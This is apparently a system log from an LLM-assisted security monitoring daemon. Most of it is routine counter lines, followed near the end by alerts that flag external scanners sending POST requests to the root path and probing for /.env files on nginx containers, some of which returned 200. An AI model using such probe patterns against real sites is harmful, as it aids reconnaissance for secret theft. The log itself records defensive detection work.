2026/03/20 04:52:01.942291 [observer] Patterns: hash=1715 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:52:31.941711 [observer] Pipeline: processed=1749 pattern_hits=1719 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:52:31.941740 [observer] Patterns: hash=1719 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:53:01.951431 [observer] Pipeline: processed=1753 pattern_hits=1723 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:53:01.951459 [observer] Patterns: hash=1723 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:53:31.943127 [observer] Pipeline: processed=1755 pattern_hits=1725 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:53:31.943181 [observer] Patterns: hash=1725 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:54:01.946681 [observer] Pipeline: processed=1758 pattern_hits=1728 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:54:01.946824 [observer] Patterns: hash=1728 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:54:31.940499 [observer] Pipeline: processed=1761 pattern_hits=1731 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:54:31.940525 [observer] Patterns: hash=1731 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:55:01.943626 [observer] Pipeline: processed=1763 pattern_hits=1733 llm_calls=30 llm_errors=0 
learned=0 Mar 20 04:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:55:01.943653 [observer] Patterns: hash=1733 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:55:31.934795 [observer] Pipeline: processed=1767 pattern_hits=1737 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:55:31.934823 [observer] Patterns: hash=1737 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:56:01.953147 [observer] Pipeline: processed=1769 pattern_hits=1739 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:56:01.953210 [observer] Patterns: hash=1739 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:56:31.936742 [observer] Pipeline: processed=1773 pattern_hits=1743 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:56:31.936770 [observer] Patterns: hash=1743 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:57:01.939529 [observer] Pipeline: processed=1775 pattern_hits=1745 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:57:01.939553 [observer] Patterns: hash=1745 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:57:31.934194 [observer] Pipeline: processed=1780 pattern_hits=1750 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:57:31.934215 [observer] Patterns: hash=1750 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:58:01.940192 [observer] Pipeline: 
processed=1783 pattern_hits=1753 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:58:01.943831 [observer] Patterns: hash=1753 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:58:31.949933 [observer] Pipeline: processed=1785 pattern_hits=1755 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:58:31.949962 [observer] Patterns: hash=1755 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:59:01.950364 [observer] Pipeline: processed=1789 pattern_hits=1759 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:59:01.950391 [observer] Patterns: hash=1759 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 04:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:59:31.943329 [observer] Pipeline: processed=1791 pattern_hits=1761 llm_calls=30 llm_errors=0 learned=0 Mar 20 04:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:59:31.943352 [observer] Patterns: hash=1761 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:00:01.938758 [observer] Pipeline: processed=1795 pattern_hits=1765 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:00:01.938789 [observer] Patterns: hash=1765 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:00:31.933603 [observer] Pipeline: processed=1797 pattern_hits=1767 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:00:31.933625 [observer] Patterns: hash=1767 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:01:01 ip-172-26-12-110 
observer[1565011]: 2026/03/20 05:01:01.953605 [observer] Pipeline: processed=1800 pattern_hits=1770 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:01:01.953638 [observer] Patterns: hash=1770 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:01:31.937346 [observer] Pipeline: processed=1803 pattern_hits=1773 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:01:31.937369 [observer] Patterns: hash=1773 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:02:01.960899 [observer] Pipeline: processed=1805 pattern_hits=1775 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:02:01.961096 [observer] Patterns: hash=1775 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:02:31.934748 [observer] Pipeline: processed=1811 pattern_hits=1781 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:02:31.934772 [observer] Patterns: hash=1781 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:03:01.962335 [observer] Pipeline: processed=1813 pattern_hits=1783 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:03:01.962364 [observer] Patterns: hash=1783 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:03:31.933885 [observer] Pipeline: processed=1817 pattern_hits=1787 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:03:31.933910 [observer] Patterns: hash=1787 prefix=0 regex=0 contains=0 deny=6 
alert=5 suppress=0 misses=30 Mar 20 05:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:04:01.949056 [observer] Pipeline: processed=1819 pattern_hits=1789 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:04:01.949093 [observer] Patterns: hash=1789 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:04:31.933824 [observer] Pipeline: processed=1822 pattern_hits=1792 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:04:31.933847 [observer] Patterns: hash=1792 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:05:01.939574 [observer] Pipeline: processed=1825 pattern_hits=1795 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:05:01.939599 [observer] Patterns: hash=1795 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:05:31.949959 [observer] Pipeline: processed=1827 pattern_hits=1797 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:05:31.949988 [observer] Patterns: hash=1797 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:06:01.975915 [observer] Pipeline: processed=1831 pattern_hits=1801 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:06:01.975969 [observer] Patterns: hash=1801 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:06:31.935045 [observer] Pipeline: processed=1833 pattern_hits=1803 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:06:31.935070 
[observer] Patterns: hash=1803 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:07:01.950879 [observer] Pipeline: processed=1837 pattern_hits=1807 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:07:01.950911 [observer] Patterns: hash=1807 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:07:31.933830 [observer] Pipeline: processed=1839 pattern_hits=1809 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:07:31.933854 [observer] Patterns: hash=1809 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:08:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:08:02.010882 [observer] Pipeline: processed=1844 pattern_hits=1814 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:08:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:08:02.010917 [observer] Patterns: hash=1814 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:08:31.933648 [observer] Pipeline: processed=1847 pattern_hits=1817 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:08:31.933675 [observer] Patterns: hash=1817 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:09:01.961182 [observer] Pipeline: processed=1849 pattern_hits=1819 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:09:01.961213 [observer] Patterns: hash=1819 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:09:31.934735 [observer] Pipeline: processed=1853 pattern_hits=1823 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:09:31 
ip-172-26-12-110 observer[1565011]: 2026/03/20 05:09:31.934763 [observer] Patterns: hash=1823 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:10:01.976543 [observer] Pipeline: processed=1855 pattern_hits=1825 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:10:01.976734 [observer] Patterns: hash=1825 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:10:31.936704 [observer] Pipeline: processed=1859 pattern_hits=1829 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:10:31.936725 [observer] Patterns: hash=1829 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:11:01.946277 [observer] Pipeline: processed=1861 pattern_hits=1831 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:11:01.946303 [observer] Patterns: hash=1831 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:11:31.949999 [observer] Pipeline: processed=1863 pattern_hits=1833 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:11:31.950024 [observer] Patterns: hash=1833 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:12:01.944338 [observer] Pipeline: processed=1867 pattern_hits=1837 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:12:01.944362 [observer] Patterns: hash=1837 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:12:31.950517 [observer] Pipeline: processed=1869 
pattern_hits=1839 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:12:31.950542 [observer] Patterns: hash=1839 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:13:01.942125 [observer] Pipeline: processed=1875 pattern_hits=1845 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:13:01.942181 [observer] Patterns: hash=1845 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:13:31.944068 [observer] Pipeline: processed=1877 pattern_hits=1847 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:13:31.944098 [observer] Patterns: hash=1847 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:14:01.938853 [observer] Pipeline: processed=1881 pattern_hits=1851 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:14:01.938879 [observer] Patterns: hash=1851 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:14:31.939139 [observer] Pipeline: processed=1883 pattern_hits=1853 llm_calls=30 llm_errors=0 learned=0 Mar 20 05:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:14:31.939184 [observer] Patterns: hash=1853 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=30 Mar 20 05:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:15:01.947620 [observer] Pipeline: processed=1887 pattern_hits=1856 llm_calls=31 llm_errors=0 learned=0 Mar 20 05:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:15:01.947648 [observer] Patterns: hash=1856 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=31 Mar 20 05:15:03 ip-172-26-12-110 observer[1565011]: 
2026/03/20 05:15:03.799120 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.92 action=allow pattern_type=prefix
Mar 20 05:15:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:15:03.799203 [analyzer] Source hint mismatch: LLM says "http_server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 05:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:15:31.934644 [observer] Pipeline: processed=1891 pattern_hits=1860 llm_calls=31 llm_errors=0 learned=0
Mar 20 05:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:15:31.934668 [observer] Patterns: hash=1860 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=31
Mar 20 05:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:16:01.946987 [observer] Pipeline: processed=1893 pattern_hits=1862 llm_calls=31 llm_errors=0 learned=0
Mar 20 05:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:16:01.947012 [observer] Patterns: hash=1862 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=31
Mar 20 05:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:16:31.936000 [observer] Pipeline: processed=1897 pattern_hits=1866 llm_calls=31 llm_errors=0 learned=0
Mar 20 05:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:16:31.936031 [observer] Patterns: hash=1866 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=31
Mar 20 05:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:17:01.958587 [observer] Pipeline: processed=1899 pattern_hits=1868 llm_calls=31 llm_errors=0 learned=0
Mar 20 05:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:17:01.958624 [observer] Patterns: hash=1868 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=31
Mar 20 05:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:17:31.933606 [observer] Pipeline: processed=1903 pattern_hits=1872 llm_calls=31 llm_errors=0 learned=0
Mar 20 05:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:17:31.933634 [observer] Patterns: hash=1872 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=31
Mar 20 05:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:18:01.943028 [observer] Pipeline: processed=1907 pattern_hits=1876 llm_calls=31 llm_errors=0 learned=0
Mar 20 05:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:18:01.943066 [observer] Patterns: hash=1876 prefix=0 regex=0 contains=0 deny=6 alert=5 suppress=0 misses=31
Mar 20 05:18:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:18:21.375003 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Nginx/Docker access log shows an HTTP POST to root path with a 405 (method not allowed) from an external IP; may indicate probing or an unexpected client behavior. Line=2026-03-20T05:18:21.374722752Z 23.94.216.234 - - [20/Mar/2026:05:18:21 +0000] "test3.admin.kovicloud.com" "POST / HTTP/1.1" 405 150 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/3.6...
Mar 20 05:18:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:18:21.972434 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Web request returns HTTP 405 (method not allowed) to an unexpected endpoint (POST /) from an external client; could be probing or misconfigured client, not definitively malicious. Line=2026-03-20T05:18:21.972112435Z 23.94.216.234 - - [20/Mar/2026:05:18:21 +0000] "test3.admin.kovicloud.com" "POST / HTTP/1.1" 405 552 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, lik...
Mar 20 05:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:18:31.934735 [observer] Pipeline: processed=1911 pattern_hits=1880 llm_calls=31 llm_errors=0 learned=0 Mar 20 05:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:18:31.934762 [observer] Patterns: hash=1880 prefix=0 regex=0 contains=0 deny=6 alert=7 suppress=0 misses=31 Mar 20 05:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:19:01.949485 [observer] Pipeline: processed=1915 pattern_hits=1884 llm_calls=31 llm_errors=0 learned=0 Mar 20 05:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:19:01.949514 [observer] Patterns: hash=1884 prefix=0 regex=0 contains=0 deny=6 alert=7 suppress=0 misses=31 Mar 20 05:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:19:31.948748 [observer] Pipeline: processed=1917 pattern_hits=1886 llm_calls=31 llm_errors=0 learned=0 Mar 20 05:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:19:31.948773 [observer] Patterns: hash=1886 prefix=0 regex=0 contains=0 deny=6 alert=7 suppress=0 misses=31 Mar 20 05:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:20:01.957755 [observer] Pipeline: processed=1921 pattern_hits=1890 llm_calls=31 llm_errors=0 learned=0 Mar 20 05:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:20:01.957816 [observer] Patterns: hash=1890 prefix=0 regex=0 contains=0 deny=6 alert=7 suppress=0 misses=31 Mar 20 05:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:20:31.934604 [observer] Pipeline: processed=1923 pattern_hits=1892 llm_calls=31 llm_errors=0 learned=0 Mar 20 05:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:20:31.934633 [observer] Patterns: hash=1892 prefix=0 regex=0 contains=0 deny=6 alert=7 suppress=0 misses=31 Mar 20 05:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:21:01.976681 [observer] Pipeline: processed=1927 pattern_hits=1896 llm_calls=31 llm_errors=0 learned=0 Mar 20 05:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:21:01.976726 [observer] Patterns: hash=1896 
prefix=0 regex=0 contains=0 deny=6 alert=7 suppress=0 misses=31
Mar 20 05:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:21:31.942831 [observer] Pipeline: processed=1929 pattern_hits=1898 llm_calls=31 llm_errors=0 learned=0
Mar 20 05:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:21:31.942859 [observer] Patterns: hash=1898 prefix=0 regex=0 contains=0 deny=6 alert=7 suppress=0 misses=31
Mar 20 05:21:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:21:49.610513 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.64 action=alert pattern_type=
Mar 20 05:21:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:21:49.610555 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T05:21:42.944206279Z 141.98.11.171 - - [20/Mar/2026:05:21:42 +0000] "media.admin.kovicloud.com" "GET /.env HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36...
Mar 20 05:21:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:21:56.978446 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 05:21:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:21:56.978479 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T05:21:43.582350051Z 141.98.11.171 - - [20/Mar/2026:05:21:43 +0000] "media.admin.kovicloud.com" "GET /.env HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.3...
Mar 20 05:21:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:21:56.978559 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T05:21:43.742145299Z 141.98.11.171 - - [20/Mar/2026:05:21:43 +0000] "media.admin.kovicloud.com" "GET /.env HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.3...
Mar 20 05:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:22:01.947285 [observer] Pipeline: processed=1934 pattern_hits=1901 llm_calls=33 llm_errors=0 learned=0
Mar 20 05:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:22:01.947315 [observer] Patterns: hash=1901 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=33
Mar 20 05:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:22:31.937855 [observer] Pipeline: processed=1938 pattern_hits=1905 llm_calls=33 llm_errors=0 learned=0
Mar 20 05:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:22:31.937882 [observer] Patterns: hash=1905 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=33
Mar 20 05:23:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:23:02.058112 [observer] Pipeline: processed=1942 pattern_hits=1909 llm_calls=33 llm_errors=0 learned=0
Mar 20 05:23:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:23:02.058143 [observer] Patterns: hash=1909 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=33
Mar 20 05:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:23:31.936081 [observer] Pipeline: processed=1946 pattern_hits=1913 llm_calls=33 llm_errors=0 learned=0
Mar 20 05:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:23:31.936112 [observer] Patterns: hash=1913 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=33
Mar 20 05:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:24:01.955030 [observer] Pipeline: processed=1948 pattern_hits=1915 llm_calls=33 llm_errors=0 learned=0
Mar 20 05:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:24:01.955066 [observer] Patterns: hash=1915 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=33
Mar 20 05:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:24:31.933917 [observer] Pipeline: processed=1952 pattern_hits=1919 llm_calls=33 llm_errors=0 learned=0
Mar 20 05:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:24:31.933938 [observer] Patterns: hash=1919 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=33
Mar 20 05:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:25:01.947434 [observer] Pipeline: processed=1954 pattern_hits=1921 llm_calls=33 llm_errors=0 learned=0
Mar 20 05:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:25:01.947476 [observer] Patterns: hash=1921 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=33
Mar 20 05:25:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:25:15.217978 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
